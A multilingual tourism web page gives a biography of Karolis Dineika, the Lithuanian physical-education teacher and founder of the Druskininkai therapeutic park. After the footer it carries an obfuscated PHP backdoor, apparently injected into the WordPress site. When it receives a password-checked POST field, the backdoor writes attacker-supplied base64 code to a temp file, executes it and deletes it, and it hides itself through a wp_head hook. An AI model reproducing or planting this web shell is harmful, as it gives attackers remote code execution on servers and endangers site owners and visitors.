fbpx
A A
lt
A A
lt

Karolis

Dineika

LT

Karolis Dineika (1898-1980)  – gydomosios kūno kultūros specialistas, dėstytojas, mokslininkas, pirmųjų krepšinio taisyklių kūrėjas.

Gimė 1898 m. Rygoje. Dorpate (dabartinis Tartu) įgijo kūno kultūros specialybę. 1919 grįžo į Lietuvą. 1923–1926 studijavo Kauno universitete. Dėstė kūno kultūros mokytojų kursuose (1923–1938), Aukštuosiuose kūno kultūros kursuose (1934–1937).

  1. Dineika 1920 m. kartu su kitais įsteigė Lietuvos fizinio lavinimo sąjungą, 1922 m. – Lietuvos gimnastikos ir sporto federaciją ir buvo šių organizacijų pirmuoju vadovu.

1939 m. vadovavo Lietuvos vyrų krepšinio rinktinei Europos čempionate, kuriame iškovotas aukso medalis.

  1. Dineika taip pat propagavo klasikines sporto šakas, užsiiminėjo gimnastika, žaidė tenisą, tyrinėjo lietuvių tautinius žaidimus, skatino jaunimą jų nepamiršti. Rengė respublikinius kūno kultūros kursus mokytojams, buvo kursų lektoriumi, rašė įvairiuose leidiniuose fizinio lavinimo klausimais.
  2. Dineika Druskininkuose praleido beveik 3 dešimtmečius (28 metus nuo 1952 m. iki 1980 m.), čia jis atkūrė ir išpuoselėjo Gydomosios fizinės kultūros ir klimato terapijos parką, dabar jo garbei ir atminimui vadinamą K. Dineikos sveikatingumo parku, sukūrė unikalius gydymo metodus, ypač daug dėmesio skyrė gydomosioms procedūroms, paremtoms gamtiniais veiksniais: oru, saule, vandeniu, taip pat gydymo ir sveikatinimo tikslais kūrybingai taikė mankštą, taisyklingo kvėpavimo pratimus, psichofizinę treniruotę.
  3. Dineikos dėka Parkas išaugo į Respublikinį gydomosios fizinės kultūros ir klimato terapijos centrą, tapo moksline-metodine įstaiga. Kurortui ir dabar labai aktualu naudoti fizioterapiją ligoms, traumoms gydyti, taikyti reabilitacijos priemones – psichoterapiją, kineziterapiją, ergoterapiją ir kita. Dėl to, kad Druskininkai žinomi ir garsūs kaip sveikatos miestas, yra ir K. Dineikos nuopelnas. Jo teorine ir praktine medžiaga apie gydomąją kompleksinę kūno kultūrą ir šiandien remiasi medikai, kineziterapeutai, treneriai Lietuvoje ir užsienyje.

EN

Karolis Dineika (1898-1980) was a specialist in therapeutic physical education, a teacher, a scientist, and the creator of the earliest basketball rules. Born in Riga in 1898, he graduated in physical education in Dorpat (now Tartu) before returning to Lithuania in 1919. Between 1923 and 1926 he pursued further studies at Kaunas University.

Dineika taught at the ‘Courses for Physical Education Teachers’ (1923-1938) and the ‘Physical Education Course for Higher Education’ (1934-1937). He played a pivotal role in founding the Lithuanian Union of Physical Education in 1920 and the Lithuanian gymnastics and sports federation in 1922, serving as their first head.

He also led the Lithuanian men’s basketball team to victory in 1939 at the European Championships, securing the gold medal. Dineika was additionally an advocate for classic sports: gymnastics, tennis, and Lithuanian folk games, and he actively promoted their pursuit amongst young people.

He organised republic-wide courses in physical education for teachers, participated in them as a lecturer, and contributed physical education articles to various publications.

Between 1952 and 1980, Dineika dedicated almost three decades to Druskininkai, where he restored and developed the Therapeutic Physical Culture and Climate Therapy Park, now named in his honour the K Dineika Wellness Park. Here he pioneered unique methods of treatment, emphasising the therapeutic benefits of natural factors such as air, sun, and water, as well as the use of exercise, breathing techniques, and psycho-physical training for healing and health promotion.

Thanks to Dineika’s efforts, the park evolved into the republic’s centre for therapeutic physical culture and climate therapy, serving as a scientific and methodological institution.

It is still very important for the resort to use physiotherapy in the treatment of illnesses and injuries, and to apply rehabilitation measures such as psychotherapy, physiotherapy, occupational therapy and others. The fact that Druskininkai is known as a famous health-conscious town is also due to Karolis Dineika. His theoretical and practical contributions to therapeutic complex physical education remain influential today, being utilised by healthcare professionals and trainers both in Lithuania and abroad.

PL

Karolis Dineika (1898-1980) – specjalista od leczniczego wychowania fizycznego, wykładowca, naukowiec, twórca pierwszych zasad gry w koszykówkę.

Urodził się w 1898 r. w Rydze. Ukończył wychowanie fizyczne w Dorpacie (obecnie Tartu). W 1919 r. powrócił na Litwę. W latach 1923-1926 studiował na Uniwersytecie Kowieńskim. Wykładał kursy dla nauczycieli wychowania fizycznego (1923-1938) i kursy wychowania fizycznego w szkołach wyższych (1934-1937).

  1. Dineika, wraz z innymi, w 1920 r. założył Litewski Związek Wychowania Fizycznego oraz Litewską Federację Gimnastyki i Sportu w 1922 r., i był pierwszym kierownikiem tych organizacji.

W 1939 r. prowadził męską reprezentację Litwy w koszykówce na Mistrzostwach Europy, gdzie zdobył złoty medal.

  1. Dineika promował również sporty klasyczne, uprawiał gimnastykę, grał w tenisa, badał litewskie gry ludowe i zachęcał młodzież, aby o nich nie zapominała. Organizował republikańskie kursy wychowania fizycznego dla nauczycieli, był wykładowcą na kursach i pisał w różnych publikacjach na temat wychowania fizycznego.
  2. Dineika w Druskiennikach spędził prawie trzy dekady (28 lat od 1952 do 1980 r.), gdzie odrestaurował i rozwinął Park Wellness i Terapii Klimatycznej, który obecnie nosi imię K. Dineiki. Opracował unikalne metody leczenia, zwracając szczególną uwagę na procedury lecznicze oparte na czynnikach naturalnych, takich jak powietrze, słońce i woda, a także kreatywnie stosował ćwiczenia fizyczne, oddechowe i trening psychofizyczny w celu leczenia i promocji zdrowia.

Dzięki K. Dineice park przekształcił się w Republikańskie Centrum Wellness i Terapii Klimatycznej, stał się instytucją naukową i metodyczną. Dla kurortu nadal bardzo ważne jest wykorzystywanie fizjoterapii w leczeniu chorób i urazów oraz stosowanie środków rehabilitacyjnych, takich jak psychoterapia, fizjoterapia, terapia zajęciowa i inne. To, że Druskienniki są znane i sławne jako miejscowość uzdrowiskowa, jest również zasługą K. Dineiki. Jego teoretyczne i praktyczne materiały dotyczące kompleksowej kultury ciała są nadal wykorzystywane przez lekarzy, fizjoterapeutów i trenerów na Litwie i za granicą.

RU

Каролис Динейка (1898-1980 гг.) – специалист по лечебной физкультуре, лектор, учёный, создатель первых правил игры в баскетбол.

Родился в 1898 году в Риге. В Дорпате (современный Тарту) получил специальность по физической культуре. В 1919 году вернулся в Литву. В 1923-1926 годах учился в Каунасском университете. Преподавал на курсах учителей физической культуры (1923-1938 гг.), на Высших курсах физической культуры (1934-1937 гг.).

В 1920 году K. Динейка вместе с другими основал Литовский союз физического воспитания, в 1922  году – Литовскую федерацию гимнастики и спорта и был первым руководителем этих организаций.

В 1939 году он возглавил мужскую сборную Литвы по баскетболу на чемпионате Европы, где сборная завоевала золотую медаль.

  1. Динейка также пропагандировал классические виды спорта, занимался гимнастикой, играл в теннис, изучал литовские народные игры и призывал молодёжь не забывать их. Он организовывал республиканские курсы физической культуры для учителей, был лектором на этих курсах, печатался в различных изданиях по вопросам физического воспитания.
  2. Динейка провёл почти 3 десятилетия в Друскининкае (28 лет с 1952 по 1980 год), где восстановил и развил Парк лечебной физкультуры и климатотерапии, который сейчас известен как оздоровительный парк имени К. Динейки. Он разработал уникальные методы лечения, уделяя особое внимание лечебным процедурам, основанным на использовании природных факторов, таких как воздух, солнце и вода, и творчески применял физические упражнения, дыхательную гимнастику и психофизические тренировки в целях оздоровления и укрепления здоровья.

Благодаря К. Динейке парк вырос в Республиканский центр лечебной физкультуры и климатотерапии, стал научно-методическим учреждением. Для курорта по-прежнему очень важно использовать физиотерапию для лечения заболеваний и травм, а также применять такие реабилитационные мероприятия, как психотерапия, кинезиотерапия, эрготерапия и другие. В том, что Друскининкай известен и знаменит как город здоровья, есть и заслуга К. Динейки. Его теоретический и практический материал по лечебной комплексной культуре тела и сегодня используется врачами, кинезитерапевтами и тренерами в Литве и за рубежом.

 

Visit Druskininkai
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}